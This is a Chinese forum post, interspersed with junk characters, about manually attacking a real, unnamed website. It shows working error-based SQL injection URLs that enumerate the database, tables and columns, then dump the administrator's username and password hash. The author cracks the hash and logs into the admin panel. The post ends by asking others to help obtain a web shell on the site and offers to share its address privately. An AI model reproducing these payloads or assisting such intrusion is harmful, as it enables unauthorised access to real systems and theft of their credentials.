近一直在学习数据库方面的知识,一直在钻研PHP的一些高级注入语法,感觉比较的有意思。于是就在网上找有洞的网站练习手注。于是有了下文。" k7 N& W7 G% I# F& V% J# K; N
首先找到网站后台,加了个admin,后台出来了
7 U y8 l2 p! q. k7 W5 @1 c7 X
6 I3 i5 d4 g9 a+ c9 S3 ]7 D9 b3 S0 U& a. Y
然后看了下网站,发现貌似都是html静态网页,但是通过图片链接发现应该是伪静态,于是在后面加了个 ',报错了,初步判断可以注入
$ f" c# w+ Z) J8 N6 W6 B( s9 Ahttp://www.myhack58.com/Article/UploadPic/2012-12/20121218145843714.jpg 从报错语句中我们可以判断出存在frame_board_conference 表,知道存在frame_board_conference,可以方便我们后面的注入。这里我用的是错误回显注入。 首先查下数据库相关信息。 www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*) from+frame_board_conference+group+by+concat(0x3a,concat(0x3a,database(),0x3a,version()),floor(rand(0)*2)))—/ c! ~7 D8 j H/ s ~
$ Y( ^4 w8 X3 l- r( I
: j% g. n t* k, V# T
/ X0 G+ G9 D. {9 o" l" U
, j# d3 |9 \5 g7 Z. n/ k" Xhttp://www.myhack58.com/Article/UploadPic/2012-12/20121218145846722.jpg7 @* s: b7 A! Z3 G, ?, l
5 X U, f% s: j9 f P! I0 {
$ W# P1 @: M/ q& |! O# \% k& u5 o" T; X3 D2 A( h
" e- d( |8 r& n V可以看到数据库版本为5.0.32,存在information_schema表,可以进一步的注入。 然后我们查表 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(table_name),1,150)from+information_schema.tables+where+table_schema=database()),0x3a,floor(rand(0)*2)))-- 得到管理员表段frame_administrator6 Y) F3 \9 d+ @9 w3 [
$ N/ }) |" L0 |
% r, f4 x8 l/ X' i& P( bhttp://www.myhack58.com/Article/UploadPic/2012-12/20121218145846695.jpg" L' S( `' V. ~
( l- p, g: L1 B& X
# `5 z" b2 U9 W% T 查字段 http://www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(column_name),1,150)from+information_schema.columns+where+table_name=0x6672616d655f61646d696e6973747261746f72),0x3a,floor(rand(0)*2)))--
l. f5 h9 u6 _) {! N. O5 [$ @! E
; r8 S7 |) q3 y) g% v) Y0 y( ?& |. P% H
得到userID,userPass字段 最后 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(userID,0x3a,userPass,0x0a),1,150)from+frame_administrator),0x3a,floor(rand(0)*2)))--) M* o% l; L6 k4 [: e/ k
6 B: s3 A) n7 x6 R9 A/ G: D! C; O0 ^7 Q, w$ w
' L/ _4 ~" S4 d
得到最终结果admin eb0a191797624dd3a48fa681d3061212 解密后成功进入后台,但是在获得shell的过程中出了点问题,可以穿php但是貌似无法解析,不知道什么原因,本人很菜,在这里希望大牛有兴趣的话帮忙拿下shell,感激不尽。Pm我,我把网址发给你。 |